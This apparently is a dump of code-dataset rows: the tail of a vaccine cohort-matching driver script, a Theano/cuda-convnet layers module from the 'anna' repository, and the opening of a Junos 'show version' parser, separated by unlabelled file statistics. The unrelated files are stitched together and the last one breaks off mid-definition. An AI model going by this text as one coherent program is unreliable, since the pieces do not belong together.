os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 1 --pop_test ALL --dose DATA D2 --days_after 7 --suffix NOVO")
os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 1 --pop_test ALL --dose DATA D1 --days_after 14 --suffix NOVO")
os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 1 --pop_test ALL --dose DATA D2 --days_after 14 --suffix NOVO")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 2 --pop_test ALL --dose DATA D1 --days_after 0 --suffix NOVO")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 2 --pop_test ALL --dose DATA D2 --days_after 0 --suffix NOVO")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 2 --pop_test ALL --dose DATA D1 --days_after 7 --suffix NOVO")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 2 --pop_test ALL --dose DATA D2 --days_after 7 --suffix NOVO")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 2 --pop_test ALL --dose DATA D1 --days_after 14 --suffix NOVO")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 2 --pop_test ALL --dose DATA D2 --days_after 14 --suffix NOVO")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 2 --pop_test ALL --suffix PRI_NA_COORTEX")
# VACCINEPOP CORONAVAC
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 0 --pop_test VACCINE --suffix VACPOPUL_PRI_NA_COORTE")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 2 --pop_test VACCINE --suffix VACPOPUL_PRI_NA_COORTE")
print(f"JAN-JUN COHORT -> Seed {seed} CORONAVAC")
# ALLPOP CORONAVAC
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-06-30 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 0 --pop_test ALL --suffix PRI_NA_COORTEX")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-06-30 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 2 --pop_test ALL --suffix PRI_NA_COORTEX")
# VACCINEPOP CORONAVAC
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-06-30 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 0 --pop_test VACCINE --suffix VACPOPUL_PRI_NA_COORTE")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-06-30 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 2 --pop_test VACCINE --suffix VACPOPUL_PRI_NA_COORTE")
#print(f"JAN-AUG COHORT -> Seed {seed} ASTRAZENECA")
## ALLPOP ASTRAZENECA
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine ASTRAZENECA --age_range 18 200 --seed {seed} --hdi_index 0 --pop_test ALL --suffix PRI_NA_COORTE")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine ASTRAZENECA --age_range 18 200 --seed {seed} --hdi_index 2 --pop_test ALL --suffix PRI_NA_COORTE")
## VACCINEPOP ASTRAZENECA
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine ASTRAZENECA --age_range 18 200 --seed {seed} --hdi_index 0 --pop_test VACCINE --suffix VACPOPUL_PRI_NA_COORTE")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine ASTRAZENECA --age_range 18 200 --seed {seed} --hdi_index 2 --pop_test VACCINE --suffix VACPOPUL_PRI_NA_COORTE")
#print(f"JAN-JUN COHORT -> Seed {seed} ASTRAZENECA")
## ALLPOP ASTRAZENECA
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-06-30 --vaccine ASTRAZENECA --age_range 18 200 --seed {seed} --hdi_index 0 --pop_test ALL --suffix PRI_NA_COORTE")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-06-30 --vaccine ASTRAZENECA --age_range 18 200 --seed {seed} --hdi_index 2 --pop_test ALL --suffix PRI_NA_COORTE")
## VACCINEPOP ASTRAZENECA
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-06-30 --vaccine ASTRAZENECA --age_range 18 200 --seed {seed} --hdi_index 0 --pop_test VACCINE --suffix VACPOPUL_PRI_NA_COORTE")
#os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-06-30 --vaccine ASTRAZENECA --age_range 18 200 --seed {seed} --hdi_index 2 --pop_test VACCINE --suffix VACPOPUL_PRI_NA_COORTE")
| 112.09434
| 208
| 0.714694
| 1,010
| 5,941
| 4.047525
| 0.062376
| 0.060665
| 0.059442
| 0.09907
| 0.989726
| 0.989726
| 0.989726
| 0.984344
| 0.984344
| 0.984344
| 0
| 0.12225
| 0.135331
| 5,941
| 52
| 209
| 114.25
| 0.673545
| 0.72917
| 0
| 0
| 0
| 0.545455
| 0.76972
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.090909
| 0
| 0.090909
| 0.181818
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4696ab556bb7ba19291153e3efd4cb4dc9663a6a
| 26,809
|
py
|
Python
|
anna/layers/cc_layers.py
|
gitter-badger/anna
|
9ea433812f6376df0190074c06bb7f4f785c6d5d
|
[
"BSD-2-Clause"
] | 64
|
2015-01-13T22:31:47.000Z
|
2020-03-31T05:29:39.000Z
|
anna/layers/cc_layers.py
|
gitter-badger/anna
|
9ea433812f6376df0190074c06bb7f4f785c6d5d
|
[
"BSD-2-Clause"
] | 2
|
2015-11-06T02:58:16.000Z
|
2019-11-28T07:57:35.000Z
|
anna/layers/cc_layers.py
|
gitter-badger/anna
|
9ea433812f6376df0190074c06bb7f4f785c6d5d
|
[
"BSD-2-Clause"
] | 26
|
2015-03-23T10:22:46.000Z
|
2021-09-26T08:48:24.000Z
|
"""
Layers using the cuda-convnet Theano wrappers that are part of pylearn2.
"""
import theano
import theano.tensor as T
import numpy
from pylearn2.sandbox.cuda_convnet.filter_acts import FilterActs
from pylearn2.sandbox.cuda_convnet.img_acts import ImageActs
from pylearn2.sandbox.cuda_convnet.pool import MaxPool, MaxPoolGrad
from pylearn2.sandbox.cuda_convnet.stochastic_pool import StochasticMaxPool
from pylearn2.sandbox.cuda_convnet.stochastic_pool import WeightedMaxPool
from pylearn2.sandbox.cuda_convnet.response_norm import CrossMapNorm
from theano.sandbox.cuda.basic_ops import gpu_contiguous
from theano.sandbox.cuda import host_from_gpu
from theano.tensor import as_tensor_variable
import layers
# TODO(tpaine) refactor the convolution layers to get rid of code repitition.
class Input2DLayer(layers.Input2DLayer):
def __init__(self, mb_size, n_features, width, height):
self.mb_size = mb_size
self.n_features = n_features
self.width = width
self.height = height
self.input_var = T.tensor4('input')
self.data_order = layers.data_order.type2
def get_output_shape(self):
# c01b instead of bc01
return (self.n_features, self.width, self.height, self.mb_size)
def output(self, *args, **kwargs):
return self.input_var
class DropoutLayer(object):
def __init__(self,
input_layer,
dropout=0.):
self.input_layer = input_layer
self.input_shape = self.input_layer.get_output_shape()
self.mb_size = self.input_layer.mb_size
self.n_features = self.input_layer.n_features
self.width = self.input_layer.width
self.height = self.input_layer.height
self.dropout = dropout
self.params = []
self.bias_params = []
self.trainable = False
self.data_order = layers.data_order.type2
assert (len(self.input_layer.get_output_shape()) == 4), \
'Input must have 4 dimensions.'
assert (self.input_layer.data_order == self.data_order), \
'Input data order does not match this layer\'s data order.'
def get_output_shape(self):
return self.input_shape
def output(self, input=None, dropout_active=True, *args, **kwargs):
input = self.input_layer.output()
if self.dropout > 0.:
retain_prob = 1 - self.dropout
mask = layers.srng.binomial(input.shape, p=retain_prob,
dtype='int32').astype('float32')
input = input / retain_prob * mask
output = input
return output
class Conv2DLayer(object):
def __init__(self,
input_layer,
n_filters,
filter_size,
weights_std,
init_bias_value,
stride=1,
nonlinearity=layers.rectify,
dropout=0.,
partial_sum=None,
pad=0,
untie_biases=False,
trainable=True):
"""
Only the valid border mode is supported.
n_filters should be a multiple of 16
"""
self.input_layer = input_layer
self.input_shape = self.input_layer.get_output_shape()
self.n_filters = n_filters
n_channels = self.input_shape[0]
self.n_channels = n_channels
self.filter_size = filter_size
self.weights_std = numpy.float32(weights_std)
self.init_bias_value = numpy.float32(init_bias_value)
self.stride = stride
self.nonlinearity = nonlinearity
self.dropout = dropout
self.partial_sum = partial_sum
self.pad = pad
self.untie_biases = untie_biases
# if untie_biases == True, each position in the output map has its own
# bias (as opposed to having the same bias everywhere for a given
# filter)
self.mb_size = self.input_layer.mb_size
self.filter_shape = (n_channels, filter_size, filter_size, n_filters)
self.trainable = trainable
self.W = layers.shared_single(4)
if self.untie_biases:
self.b = layers.shared_single(3)
else:
self.b = layers.shared_single(1)
self.params = [self.W, self.b]
self.bias_params = [self.b]
self.data_order = layers.data_order.type2
assert (len(self.input_layer.get_output_shape()) == 4), \
'Input must have 4 dimensions.'
assert (self.input_layer.data_order == self.data_order), \
'Input data order does not match this layer\'s data order.'
self.reset_params()
self.filter_acts_op = FilterActs(stride=self.stride,
partial_sum=self.partial_sum,
pad=self.pad)
def reset_params(self):
self.W.set_value(numpy.random.randn(*self.filter_shape).astype(
numpy.float32) * self.weights_std)
if self.untie_biases:
self.b.set_value(
numpy.ones(self.get_output_shape()[:3]).astype(numpy.float32)
* self.init_bias_value)
else:
self.b.set_value(numpy.ones(self.n_filters).astype(numpy.float32)
* self.init_bias_value)
def get_output_shape(self):
output_width = int(numpy.ceil((
self.input_shape[1] + 2 * self.pad - self.filter_size
+ self.stride)*1.0 / self.stride))
output_height = int(numpy.ceil((
self.input_shape[2] + 2 * self.pad - self.filter_size
+ self.stride)*1.0 / self.stride))
output_shape = (self.n_filters, output_width, output_height,
self.mb_size)
return output_shape
def output(self, input=None, dropout_active=True, *args, **kwargs):
if input is None:
input = self.input_layer.output(dropout_active=dropout_active,
*args, **kwargs)
if dropout_active and (self.dropout > 0.):
retain_prob = 1 - self.dropout
mask = layers.srng.binomial(input.shape, p=retain_prob,
dtype='int32').astype('float32')
# apply the input mask and rescale the input accordingly.
# By doing this it's no longer necessary to rescale the weights
# at test time.
input = input / retain_prob * mask
contiguous_input = gpu_contiguous(input)
contiguous_filters = gpu_contiguous(self.W)
conved = self.filter_acts_op(contiguous_input, contiguous_filters)
if self.untie_biases:
conved += self.b.dimshuffle(0, 1, 2, 'x')
else:
conved += self.b.dimshuffle(0, 'x', 'x', 'x')
return self.nonlinearity(conved)
class Conv2DNoBiasLayer(object):
def __init__(self,
input_layer,
n_filters,
filter_size,
weights_std,
stride=1,
nonlinearity=layers.rectify,
dropout=0.,
partial_sum=None,
pad=0,
trainable=True):
"""
Only the valid border mode is supported.
n_filters should be a multiple of 16
"""
self.input_layer = input_layer
self.input_shape = self.input_layer.get_output_shape()
self.n_filters = n_filters
n_channels = self.input_shape[0]
self.n_channels = n_channels
self.filter_size = filter_size
self.weights_std = numpy.float32(weights_std)
self.stride = stride
self.nonlinearity = nonlinearity
self.dropout = dropout
self.partial_sum = partial_sum
self.pad = pad
self.mb_size = self.input_layer.mb_size
self.data_order = layers.data_order.type2
assert (len(self.input_layer.get_output_shape()) == 4), \
'Input must have 4 dimensions.'
assert (self.input_layer.data_order == self.data_order), \
'Input data order does not match this layer\'s data order.'
self.filter_shape = (n_channels, filter_size, filter_size, n_filters)
self.trainable = trainable
self.W = layers.shared_single(4)
self.params = [self.W]
self.reset_params()
self.filter_acts_op = FilterActs(stride=self.stride,
partial_sum=self.partial_sum,
pad=self.pad)
def reset_params(self):
self.W.set_value(numpy.random.randn(*self.filter_shape).astype(
numpy.float32) * self.weights_std)
def get_output_shape(self):
output_width = int(numpy.ceil((
self.input_shape[1] + 2 * self.pad - self.filter_size
+ self.stride)*1.0 / self.stride))
output_height = int(numpy.ceil((
self.input_shape[2] + 2 * self.pad - self.filter_size
+ self.stride)*1.0 / self.stride))
output_shape = (self.n_filters, output_width, output_height,
self.mb_size)
return output_shape
def output(self, input=None, dropout_active=True, *args, **kwargs):
if input is None:
input = self.input_layer.output(dropout_active=dropout_active,
*args, **kwargs)
if dropout_active and (self.dropout > 0.):
retain_prob = 1 - self.dropout
mask = layers.srng.binomial(input.shape, p=retain_prob,
dtype='int32').astype('float32')
# apply the input mask and rescale the input accordingly.
# By doing this it's no longer necessary to rescale the weights
# at test time.
input = input / retain_prob * mask
contiguous_input = gpu_contiguous(input)
contiguous_filters = gpu_contiguous(self.W)
conved = self.filter_acts_op(contiguous_input, contiguous_filters)
return self.nonlinearity(conved)
class Deconv2DLayer(object):
def __init__(self,
input_layer,
mirror_layer,
nonlinearity=None):
"""
Only the valid border mode is supported.
n_filters should be a multiple of 16
"""
self.mirror_layer = mirror_layer
self.input_layer = input_layer
self.input_shape = self.input_layer.get_output_shape()
n_filters = self.input_shape[0]
if nonlinearity:
self.nonlinearity = nonlinearity
else:
self.nonlinearity = mirror_layer.nonlinearity
self.n_channels = mirror_layer.n_channels
self.n_filters = mirror_layer.n_filters
self.filter_size = mirror_layer.filter_size
self.weights_std = mirror_layer.weights_std
self.init_bias_value = mirror_layer.init_bias_value
self.stride = mirror_layer.stride
self.dropout = mirror_layer.dropout
self.partial_sum = mirror_layer.partial_sum
self.pad = mirror_layer.pad
self.untie_biases = mirror_layer.untie_biases
# if untie_biases == True, each position in the output map has its own
# bias (as opposed to having the same bias everywhere for a filter)
self.mb_size = self.input_layer.mb_size
self.filter_shape = mirror_layer.filter_shape
self.trainable = False
self.W = mirror_layer.W
self.b = mirror_layer.b
# self.params = [self.W, self.b]
self.params = []
self.bias_params = [self.b]
self.data_order = layers.data_order.type2
assert (len(self.input_layer.get_output_shape()) == 4), \
'Input must have 4 dimensions.'
assert (self.input_layer.data_order == self.data_order), \
'Input data order does not match this layer\'s data order.'
self.image_acts_op = ImageActs(stride=self.stride,
partial_sum=self.partial_sum,
pad=self.pad)
def get_output_shape(self):
output_shape = self.mirror_layer.input_layer.get_output_shape()
return output_shape
def output(self, input=None, dropout_active=True, *args, **kwargs):
if input is None:
input = self.input_layer.output(dropout_active=dropout_active,
*args, **kwargs)
if self.untie_biases:
input -= self.b.dimshuffle(0, 1, 2, 'x')
else:
input -= self.b.dimshuffle(0, 'x', 'x', 'x')
if dropout_active and (self.dropout > 0.):
retain_prob = 1 - self.dropout
mask = layers.srng.binomial(input.shape, p=retain_prob,
dtype='int32').astype('float32')
# apply the input mask and rescale the input accordingly.
# By doing this it's no longer necessary to rescale the weights
# at test time.
input = input / retain_prob * mask
contiguous_input = gpu_contiguous(input)
contiguous_filters = gpu_contiguous(self.W)
if self.stride == 1:
deconved = self.image_acts_op(contiguous_input, contiguous_filters)
else:
_, x, y, _ = self.get_output_shape()
deconved = self.image_acts_op(contiguous_input, contiguous_filters,
as_tensor_variable((x, y)))
return self.nonlinearity(deconved)
class DeconvUntied2DLayer(object):
def __init__(self,
input_layer,
mirror_layer,
nonlinearity=None):
"""
Only the valid border mode is supported.
n_filters should be a multiple of 16
"""
self.mirror_layer = mirror_layer
self.input_layer = input_layer
self.input_shape = self.input_layer.get_output_shape()
n_filters = self.input_shape[0]
if nonlinearity:
self.nonlinearity = nonlinearity
else:
self.nonlinearity = mirror_layer.nonlinearity
self.n_channels = mirror_layer.n_channels
self.n_filters = mirror_layer.n_filters
self.filter_size = mirror_layer.filter_size
self.weights_std = mirror_layer.weights_std
self.init_bias_value = mirror_layer.init_bias_value
self.stride = mirror_layer.stride
self.dropout = mirror_layer.dropout
self.partial_sum = mirror_layer.partial_sum
self.pad = mirror_layer.pad
self.untie_biases = mirror_layer.untie_biases
self.mb_size = self.input_layer.mb_size
self.filter_shape = mirror_layer.filter_shape
self.trainable = False
self.W = layers.shared_single(4)
if self.untie_biases:
self.b = layers.shared_single(3)
else:
self.b = layers.shared_single(1)
# self.params = [self.W, self.b]
self.params = [self.W, self.b]
self.bias_params = [self.b]
self.data_order = layers.data_order.type2
assert (len(self.input_layer.get_output_shape()) == 4), \
'Input must have 4 dimensions.'
assert (self.input_layer.data_order == self.data_order), \
'Input data order does not match this layer\'s data order.'
self.reset_params()
self.image_acts_op = ImageActs(stride=self.stride,
partial_sum=self.partial_sum,
pad=self.pad)
def reset_params(self):
self.W.set_value(numpy.random.randn(*self.filter_shape).astype(
numpy.float32) * self.weights_std)
if self.untie_biases:
self.b.set_value(
numpy.ones(self.get_output_shape()[:3]).astype(numpy.float32)
* self.init_bias_value)
else:
self.b.set_value(numpy.ones(self.n_filters).astype(numpy.float32)
* self.init_bias_value)
def get_output_shape(self):
output_shape = self.mirror_layer.input_layer.get_output_shape()
return output_shape
def output(self, input=None, dropout_active=True, *args, **kwargs):
if input is None:
input = self.input_layer.output(dropout_active=dropout_active,
*args, **kwargs)
if self.untie_biases:
input -= self.b.dimshuffle(0, 1, 2, 'x')
else:
input -= self.b.dimshuffle(0, 'x', 'x', 'x')
if dropout_active and (self.dropout > 0.):
retain_prob = 1 - self.dropout
mask = layers.srng.binomial(input.shape, p=retain_prob,
dtype='int32').astype('float32')
# apply the input mask and rescale the input accordingly.
# By doing this it's no longer necessary to rescale the weights
# at test time.
input = input / retain_prob * mask
contiguous_input = gpu_contiguous(input)
contiguous_filters = gpu_contiguous(self.W)
if self.stride == 1:
deconved = self.image_acts_op(contiguous_input, contiguous_filters)
else:
_, x, y, _ = self.get_output_shape()
deconved = self.image_acts_op(contiguous_input, contiguous_filters,
as_tensor_variable((x, y)))
return self.nonlinearity(deconved)
class Deconv2DNoBiasLayer(object):
def __init__(self,
input_layer,
mirror_layer,
nonlinearity=None):
"""
Only the valid border mode is supported.
n_filters should be a multiple of 16
"""
self.mirror_layer = mirror_layer
self.input_layer = input_layer
self.input_shape = self.input_layer.get_output_shape()
n_filters = self.input_shape[0]
if nonlinearity:
self.nonlinearity = nonlinearity
else:
self.nonlinearity = mirror_layer.nonlinearity
self.n_channels = mirror_layer.n_channels
self.n_filters = mirror_layer.n_filters
self.filter_size = mirror_layer.filter_size
self.weights_std = mirror_layer.weights_std
self.stride = mirror_layer.stride
self.dropout = mirror_layer.dropout
self.partial_sum = mirror_layer.partial_sum
self.pad = mirror_layer.pad
self.mb_size = self.input_layer.mb_size
self.filter_shape = mirror_layer.filter_shape
self.trainable = False
self.W = mirror_layer.W
self.params = []
self.data_order = layers.data_order.type2
assert (len(self.input_layer.get_output_shape()) == 4), \
'Input must have 4 dimensions.'
assert (self.input_layer.data_order == self.data_order), \
'Input data order does not match this layer\'s data order.'
self.image_acts_op = ImageActs(stride=self.stride,
partial_sum=self.partial_sum,
pad=self.pad)
def get_output_shape(self):
output_shape = self.mirror_layer.input_layer.get_output_shape()
return output_shape
def output(self, input=None, dropout_active=True, *args, **kwargs):
if input is None:
input = self.input_layer.output(dropout_active=dropout_active,
*args, **kwargs)
if dropout_active and (self.dropout > 0.):
retain_prob = 1 - self.dropout
mask = layers.srng.binomial(input.shape, p=retain_prob,
dtype='int32').astype('float32')
# apply the input mask and rescale the input accordingly.
# By doing this it's no longer necessary to rescale the weights
# at test time.
input = input / retain_prob * mask
contiguous_input = gpu_contiguous(input)
contiguous_filters = gpu_contiguous(self.W)
if self.stride == 1:
deconved = self.image_acts_op(contiguous_input, contiguous_filters)
else:
_, x, y, _ = self.get_output_shape()
deconved = self.image_acts_op(contiguous_input, contiguous_filters,
as_tensor_variable((x, y)))
return self.nonlinearity(deconved)
class Pooling2DLayer(object):
def __init__(self, input_layer, pool_size, stride=None):
"""
pool_size is an INTEGER, not a tuple. We can only do square pooling.
If the stride is none, it is taken to be the same as the pool size.
borders are never ignored.
"""
self.pool_size = pool_size
self.stride = stride if stride is not None else pool_size
self.input_layer = input_layer
self.trainable = False
self.params = []
self.bias_params = []
self.mb_size = self.input_layer.mb_size
self.data_order = layers.data_order.type2
assert (len(self.input_layer.get_output_shape()) == 4), \
'Input must have 4 dimensions.'
assert (self.input_layer.data_order == self.data_order), \
'Input data order does not match this layer\'s data order.'
self.pool_op = MaxPool(ds=self.pool_size, stride=self.stride)
def get_output_shape(self):
input_shape = self.input_layer.get_output_shape()
w, h = input_shape[1], input_shape[2]
new_w = int(numpy.ceil(float(w - self.pool_size + self.stride)
/ self.stride))
new_h = int(numpy.ceil(float(h - self.pool_size + self.stride)
/ self.stride))
return (input_shape[0], new_w, new_h, input_shape[3])
def output(self, *args, **kwargs):
input = self.input_layer.output(*args, **kwargs)
contiguous_input = gpu_contiguous(input)
return self.pool_op(contiguous_input)
class Unpooling2DLayer(object):
def __init__(self, input_layer, pooling_layer):
"""
pool_size is an INTEGER, not a tuple. We can only do square pooling.
if the stride is none, it is taken to be the same as the pool size.
borders are never ignored.
"""
self.pool_size = pooling_layer.pool_size
self.stride = pooling_layer.stride
self.input_layer = input_layer
self.pooling_layer = pooling_layer
self.trainable = False
self.params = []
self.bias_params = []
self.mb_size = self.input_layer.mb_size
self.data_order = layers.data_order.type2
assert (len(self.input_layer.get_output_shape()) == 4), \
'Input must have 4 dimensions.'
assert (self.input_layer.data_order == self.data_order), \
'Input data order does not match this layer\'s data order.'
self.unpool_op = MaxPoolGrad(ds=self.pool_size, stride=self.stride,
start=0)
def get_output_shape(self):
shape = self.pooling_layer.input_layer.get_output_shape()
return shape
def output(self, *args, **kwargs):
input = self.input_layer.output()
max_out = self.pooling_layer.output()
orig_input = self.pooling_layer.input_layer.output()
return self.unpool_op(orig_input, max_out, input)
class ShuffleC01BToBC01Layer(object):
"""
This layer dimshuffles 4D input for interoperability for C01B and BC01 ops.
C01B (cuda convnet) -> BC01 (theano)
"""
def __init__(self, input_layer):
self.input_layer = input_layer
self.trainable = False
self.params = []
self.bias_params = []
self.mb_size = self.input_layer.mb_size
self.data_order = layers.data_order.type1
assert (len(self.input_layer.get_output_shape()) == 4), \
'Input must have 4 dimensions.'
assert (self.input_layer.data_order == layers.data_order.type2), \
'Input data order does not match this layer\'s data order.'
def get_output_shape(self):
input_shape = self.input_layer.get_output_shape()
return (input_shape[3], input_shape[0], input_shape[1], input_shape[2])
def output(self, *args, **kwargs):
input = self.input_layer.output(*args, **kwargs)
return input.dimshuffle(3, 0, 1, 2)
class ShuffleBC01ToC01BLayer(object):
"""
This layer dimshuffles 4D input for interoperability for C01B and BC01 ops.
BC01 (theano) -> C01B (cuda convnet)
"""
def __init__(self, input_layer):
self.input_layer = input_layer
self.trainable = False
self.params = []
self.bias_params = []
self.mb_size = self.input_layer.mb_size
self.data_order = layers.data_order.type2
assert (len(self.input_layer.get_output_shape()) == 4), \
'Input must have 4 dimensions.'
assert (self.input_layer.data_order == layers.data_order.type1), \
'Input data order does not match this layer\'s data order.'
def get_output_shape(self):
input_shape = self.input_layer.get_output_shape()
return (input_shape[1], input_shape[2], input_shape[3], input_shape[0])
def output(self, *args, **kwargs):
input = self.input_layer.output(*args, **kwargs)
return input.dimshuffle(1, 2, 3, 0)
class Deconv2DNoBiasLayerGuidedBackProp(Deconv2DNoBiasLayer):
def output(self, input=None, dropout_active=True, *args, **kwargs):
if input is None:
input = self.input_layer.output(dropout_active=dropout_active,
*args, **kwargs)
if dropout_active and (self.dropout > 0.):
retain_prob = 1 - self.dropout
mask = layers.srng.binomial(input.shape, p=retain_prob,
dtype='int32').astype('float32')
# apply the input mask and rescale the input accordingly.
# By doing this it's no longer necessary to rescale the weights
# at test time.
input = input / retain_prob * mask
contiguous_input = gpu_contiguous(input)
contiguous_filters = gpu_contiguous(self.W)
if self.stride == 1:
deconved = self.image_acts_op(contiguous_input, contiguous_filters)
else:
_, x, y, _ = self.get_output_shape()
deconved = self.image_acts_op(contiguous_input, contiguous_filters,
as_tensor_variable((x, y)))
mask = (deconved > 0.0) * (self.mirror_layer.input_layer.output() > 0.0)
return mask * deconved
| 36.724658
| 80
| 0.604163
| 3,275
| 26,809
| 4.716641
| 0.065649
| 0.058846
| 0.066162
| 0.02829
| 0.895449
| 0.864245
| 0.847737
| 0.832459
| 0.824432
| 0.820548
| 0
| 0.012487
| 0.306986
| 26,809
| 729
| 81
| 36.775034
| 0.818935
| 0.083964
| 0
| 0.84585
| 0
| 0
| 0.033851
| 0
| 0
| 0
| 0
| 0.001372
| 0.039526
| 1
| 0.073123
| false
| 0
| 0.025692
| 0.005929
| 0.167984
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d3ca02476d65c821777d2e06310223c1136ca350
| 27,771
|
py
|
Python
|
src/genie/libs/parser/junos/show_version.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 204
|
2018-06-27T00:55:27.000Z
|
2022-03-06T21:12:18.000Z
|
src/genie/libs/parser/junos/show_version.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 468
|
2018-06-19T00:33:18.000Z
|
2022-03-31T23:23:35.000Z
|
src/genie/libs/parser/junos/show_version.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 309
|
2019-01-16T20:21:07.000Z
|
2022-03-30T12:56:41.000Z
|
""" show_krt.py
JunOs parsers for the following show commands:
* show version detail
* show version detail no-forwarding
* show version invoke-on all-routing-engines
"""
import re
from genie.metaparser import MetaParser
from pyats.utils.exceptions import SchemaError
from genie.metaparser.util.schemaengine import (Any,
Optional, Use, Schema, ListOf)
class ShowVersionDetailSchema(MetaParser):
""" schema = {
Optional("@xmlns:junos"): str,
"software-information": {
Optional("cli"): {
"display-version": str
},
"host-name": str,
"junos-version": str,
"output": "list",
"package-information": [
{
"comment": str,
"name": str
}
],
"product-model": str,
"product-name": str,
"version-information": [
{
"build-date": str,
"build-number": str,
"builder": str,
"component": str,
"major": str,
"minor": str,
"release": str,
"release-category": str,
"spin": str
}
]
}
} """
# Main Schema
schema = {
Optional("@xmlns:junos"): str,
"software-information": {
Optional("cli"): {
Optional("display-version"): str
},
"host-name": str,
"junos-version": str,
"output": list,
"package-information": ListOf({
"comment": str,
"name": str
}),
"product-model": str,
Optional("product-name"): str,
"version-information": ListOf({
"build-date": str,
Optional("build-number"): str,
"builder": str,
"component": str,
Optional("major"): str,
Optional("minor"): str,
"release": str,
Optional("release-category"): str,
Optional("spin"): str
})
}
}
class ShowVersionDetail(ShowVersionDetailSchema):
""" Parser for:
* show version detail
"""
cli_command = 'show version detail'
def cli(self, output=None):
if not output:
out = self.device.execute(self.cli_command)
else:
out = output
ret_dict = {}
#Hostname: sr_hktGDS201
p1 = re.compile(r'^Hostname: +(?P<host_name>\S+)$')
#Model: vmx
p2 = re.compile(r'^Model: +(?P<product_model>\S+)$')
#Junos: 19.2R1.8
p3 = re.compile(r'^Junos: +(?P<junos_version>\S+)$')
#JLAUNCHD release 19.2R1.8 built by builder on 2019-06-21 17:47:00 UTC
p4 = re.compile(r'^(?P<output>\AJLAUNCHD+[\S\s]+)$')
#smartd 6.4 2015-06-04 r4109 [FreeBSD JNPR-11.0-20190517.f0321c3_buil amd64] Junos Build
p5 = re.compile(r'^(?P<output>\Asmartd+[\S\s]+)$')
#Copyright (C) 2002-15, Bruce Allen, Christian Franke, www.smartmontools.org
p6 = re.compile(r'^(?P<output>\ACopyright+[\S\s]+)$')
#JUNOS OS Kernel 64-bit [20190517.f0321c3_builder_stable_11]
p7 = re.compile(r'^(?P<comment>JUNOS[\S\s]+)$')
#KERNEL JNPR-11.0-20190517.f0321c3_builder_stable_11 #0 r356482+f0321c3e9c9(HEAD) built
p8 = re.compile(r'^(?P<comment>KERNEL[\S\s]+)$')
#MGD release 20190606.224121_builder.r1033375 built by builder on 2019-06-06 22:58:49 UTC
#COMMIT-SYNCD release 20190606.224121_builder.r1033375 built by builder on 2019-06-06 22:58:46 UTC
p9 = re.compile(r'^(?P<component>[\w\s\-]+)release +(?P<release>\S+) +built +by +(?P<builder>\S+) +on +(?P<build_date>[\S\s]+)$')
package_map = {"JUNOS OS Kernel 64-bit [20190517.f0321c3_builder_stable_11]":"os-kernel",
"JUNOS OS libs [20190517.f0321c3_builder_stable_11]":"os-libs",
"JUNOS OS runtime [20190517.f0321c3_builder_stable_11]":"os-runtime",
"JUNOS OS time zone information [20190517.f0321c3_builder_stable_11]":"zoneinfo",
"JUNOS network stack and utilities [20190621.152752_builder_junos_192_r1]":"netstack",
